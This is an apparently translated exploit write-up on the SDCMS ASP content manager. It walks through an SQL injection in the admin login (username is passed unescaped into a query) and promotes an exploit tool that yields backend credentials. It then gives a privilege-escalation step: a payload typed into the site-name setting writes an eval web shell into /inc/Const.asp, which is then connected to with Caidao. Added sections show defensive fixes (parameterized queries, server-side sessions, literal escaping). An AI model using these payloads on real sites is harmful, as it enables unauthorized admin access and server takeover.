Author: T00LS 鬼哥
Vulnerable file: <backend directory>/index.asp

Sub Check
    Dim username,password,code,getcode,Rs
    IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
    username=FilterText(Trim(Request.Form("username")),1)
    password=FilterText(Trim(Request.Form("password")),1)
    code=Trim(Request.Form("yzm"))
    getcode=Session("SDCMSCode")
    IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
    IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)":died
    IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)":died
    IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)":died
    IF username="" or password="" Then
        Echo "用户名或密码不能为空":died
    Else
        ' username (after FilterText mode 1) is concatenated straight into the SQL text
        Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
        IF Rs.Eof Then
            AddLog username,GetIp,"登录失败",1
            Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
        Else
            Add_Cookies "sdcms_id",Rs(0)
            Add_Cookies "sdcms_name",username
            Add_Cookies "sdcms_pwd",Rs(2)
            Add_Cookies "sdcms_admin",Rs(3)
            Add_Cookies "sdcms_alllever",Rs(4)
            Add_Cookies "sdcms_infolever",Rs(5)
            Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
            AddLog username,GetIp,"登录成功",1
            ' automatically delete log records older than 30 days
            IF Sdcms_DataType Then
                Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
            Else
                Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
            End IF
            Go("sdcms_index.asp")
        End IF
        Rs.Close
        Set Rs=Nothing
    End IF
End Sub

We can see that username is run through FilterText. Let's look at the code of FilterText:
Function FilterText(ByVal t0,ByVal t1)
    IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
    t0=Trim(t0)
    Select Case t1
        Case "1"
            t0=Replace(t0,Chr(32),"")
            t0=Replace(t0,Chr(13),"")
            t0=Replace(t0,Chr(10)&Chr(10),"")
            t0=Replace(t0,Chr(10),"")
        Case "2"
            t0=Replace(t0,Chr(8),"")   ' backspace
            t0=Replace(t0,Chr(9),"")   ' tab (horizontal tab)
            t0=Replace(t0,Chr(10),"")  ' line feed
            t0=Replace(t0,Chr(11),"")  ' vertical tab
            t0=Replace(t0,Chr(12),"")  ' form feed
            t0=Replace(t0,Chr(13),"")  ' carriage return; chr(13)&chr(10) is the CR+LF pair
            t0=Replace(t0,Chr(22),"")
            t0=Replace(t0,Chr(32),"")  ' space
            t0=Replace(t0,Chr(33),"")  ' !
            t0=Replace(t0,Chr(34),"")  ' "
            t0=Replace(t0,Chr(35),"")  ' #
            t0=Replace(t0,Chr(36),"")  ' $
            t0=Replace(t0,Chr(37),"")  ' %
            t0=Replace(t0,Chr(38),"")  ' &
            t0=Replace(t0,Chr(39),"")  ' '
            t0=Replace(t0,Chr(40),"")  ' (
            t0=Replace(t0,Chr(41),"")  ' )
            t0=Replace(t0,Chr(42),"")  ' *
            t0=Replace(t0,Chr(43),"")  ' +
            t0=Replace(t0,Chr(44),"")  ' ,
            t0=Replace(t0,Chr(45),"")  ' -
            t0=Replace(t0,Chr(46),"")  ' .
            t0=Replace(t0,Chr(47),"")  ' /
            t0=Replace(t0,Chr(58),"")  ' :
            t0=Replace(t0,Chr(59),"")  ' ;
            t0=Replace(t0,Chr(60),"")  ' <
            t0=Replace(t0,Chr(61),"")  ' =
            t0=Replace(t0,Chr(62),"")  ' >
            t0=Replace(t0,Chr(63),"")  ' ?
            t0=Replace(t0,Chr(64),"")  ' @
            t0=Replace(t0,Chr(91),"")  ' [
            t0=Replace(t0,Chr(92),"")  ' \
            t0=Replace(t0,Chr(93),"")  ' ]
            t0=Replace(t0,Chr(94),"")  ' ^
            t0=Replace(t0,Chr(95),"")  ' _
            t0=Replace(t0,Chr(96),"")  ' `
            t0=Replace(t0,Chr(123),"") ' {
            t0=Replace(t0,Chr(124),"") ' |
            t0=Replace(t0,Chr(125),"") ' }
            t0=Replace(t0,Chr(126),"") ' ~
        Case Else
            ' HTML-entity-encode the characters that matter for output
            t0=Replace(t0, "&", "&amp;")
            t0=Replace(t0, "'", "&#39;")
            t0=Replace(t0, """", "&quot;")
            t0=Replace(t0, "<", "&lt;")
            t0=Replace(t0, ">", "&gt;")
    End Select
    IF Instr(Lcase(t0),"expression")>0 Then
        ' insert a soft hyphen (Chr 173) so the CSS expression() keyword no longer matches
        t0=Replace(t0,"expression","e"&Chr(173)&"xpression", 1, -1, 0)
    End If
    FilterText=t0
End Function

See that? When the mode argument is 1, the only thing filtered is:

    t0=Replace(t0,Chr(32),"")
    t0=Replace(t0,Chr(13),"")
    t0=Replace(t0,Chr(10)&Chr(10),"")
    t0=Replace(t0,Chr(10),"")

That is, spaces and line breaks. Single quotes and every other SQL metacharacter are left alone, and the resulting username is concatenated straight into the Select on Sd_Admin.
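The fix a maintainer would apply here is to stop assembling the query from strings at all. The following is an added example written for this page, not SDCMS's own code: the same Sd_Admin lookup done through an ADODB.Command with bound parameters, and with the login state kept server-side in Session instead of in cookies. It assumes the page's own helpers (Conn as an open ADODB.Connection, md5, AddLog, GetIp, Echo, Go) behave as they are used in Check; the parameter sizes, the Session keys and the use of Session itself are assumptions. Captcha and lockout handling from the original are omitted to keep the example to the credential check.

```vbscript
' Added example (not SDCMS's own code): parameterized replacement for the
' Sd_Admin lookup in Check. Assumes Conn, md5, AddLog, GetIp, Echo and Go
' exist as used on the page. Column and table names come from the original query.
Const adCmdText = 1
Const adVarChar = 200
Const adInteger = 3
Const adParamInput = 1

Function FindAdmin(ByVal username, ByVal pwdHash)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = Conn
    cmd.CommandType = adCmdText
    ' The ? placeholders are bound by the provider: a quote or comment marker
    ' inside username is data, never part of the statement.
    cmd.CommandText = "Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever " & _
                      "From Sd_Admin Where Sdcms_Name=? And Sdcms_Pwd=?"
    ' sizes 50 and 32 are assumptions (an MD5 hex digest is 32 characters)
    cmd.Parameters.Append cmd.CreateParameter("name", adVarChar, adParamInput, 50, username)
    cmd.Parameters.Append cmd.CreateParameter("pwd", adVarChar, adParamInput, 32, pwdHash)
    Set FindAdmin = cmd.Execute
End Function

Sub RecordLogin(ByVal adminId, ByVal ip)
    ' The original Update also spliced GetIp into SQL text; bind it as well.
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = Conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "Update Sd_Admin Set logintimes=logintimes+1,LastIp=? Where id=?"
    cmd.Parameters.Append cmd.CreateParameter("ip", adVarChar, adParamInput, 45, ip)
    cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, 4, adminId)
    cmd.Execute
End Sub

Sub CheckSafe
    Dim username, password, Rs
    ' No FilterText needed for SQL safety once the values are bound parameters;
    ' Trim is kept only to match the original behaviour.
    username = Trim(Request.Form("username"))
    password = Trim(Request.Form("password"))
    If username = "" Or password = "" Then Echo "用户名或密码不能为空": Exit Sub
    Set Rs = FindAdmin(username, md5(password))
    If Rs.Eof Then
        AddLog username, GetIp, "登录失败", 1
        Echo "用户名或密码错误"
    Else
        ' Keep state server-side. The original wrote the stored password hash
        ' (Rs(2)) and the privilege columns into client cookies, where they can be
        ' read and rewritten by whoever holds the browser; only the row id, name
        ' and admin flag are kept here, in Session (key names are assumptions).
        Session("sdcms_id") = Rs(0)
        Session("sdcms_name") = Rs(1)
        Session("sdcms_admin") = Rs(3)
        RecordLogin Rs(0), GetIp
        AddLog username, GetIp, "登录成功", 1
        Go "sdcms_index.asp"
    End If
    Rs.Close
    Set Rs = Nothing
End Sub
```

With the parameters bound, FilterText mode 1 is no longer doing any security work on this path, and the question of which characters it strips becomes irrelevant to the query. The cookie change is independent of the injection: as long as sdcms_pwd and the privilege flags live in cookies, fixing the SQL alone still leaves the hash and the authorization decision on the client.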
The vulnerability lets you obtain the backend account and password directly. SDCMS's default backend path is /admin/; if the site owner has changed the backend path, find it yourself!
EXP tool download (this tool only runs on XP): sdcms-EXP

Test:

Now enter the captcha in the tool and click OK.

See, we are taken straight to the backend management interface, heh!

Straight into the backend...

SDCMS privilege escalation:

Method 1: visit /<backend directory>/sdcms_set.asp and append ":eval(request(Chr(63)))' to the "site name" field; that is enough to write a one-line shell straight into /inc/Const.asp. The shell's connection password is ?

OK, now connect with Caidao!
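Looked at from the maintainer's side, the sdcms_set.asp issue is that a settings value is written into a generated .asp file without being escaped for the VBScript string literal it lands in. The helper below is an added example, not SDCMS's own code. It assumes, without having checked SDCMS's writer, that /inc/Const.asp stores the value as a double-quoted literal of the form Const SiteName = "..."; SiteName is a placeholder name.

```vbscript
' Added example (not SDCMS's own code): make a settings value safe to embed as a
' double-quoted VBScript string literal in a generated constants file.
' Assumption: Const.asp is written as   Const <Name> = "<value>"
Function SafeConstValue(ByVal v)
    Dim i, c, out
    out = ""
    For i = 1 To Len(v)
        c = Mid(v, i, 1)
        Select Case AscW(c)
            Case 34
                ' " would close the literal; VBScript escapes it by doubling
                out = out & """"""
            Case 0, 10, 13
                ' NUL and line breaks are dropped: a line break would let the
                ' rest of the value continue as new VBScript source
            Case Else
                out = out & c
        End Select
    Next
    SafeConstValue = out
End Function

' Builds the line to write; the value is always a single closed literal.
Function ConstLine(ByVal name, ByVal v)
    ConstLine = "Const " & name & " = """ & SafeConstValue(v) & """"
End Function

' Sample use with a constructed value (not from the page):
'   ConstLine("SiteName", "My ""quoted"" site")
' yields   Const SiteName = "My """"quoted"""" site"
' which VBScript reads back as   My "quoted" site
```

With the quote doubled, a colon or apostrophe that follows it in the submitted value stays inside the literal, so it is stored as text rather than parsed as a statement separator or comment. The same escaping should be applied to every field that sdcms_set.asp writes into Const.asp, not just the site name, and the file should be written from an allow-listed set of keys rather than from raw form fields.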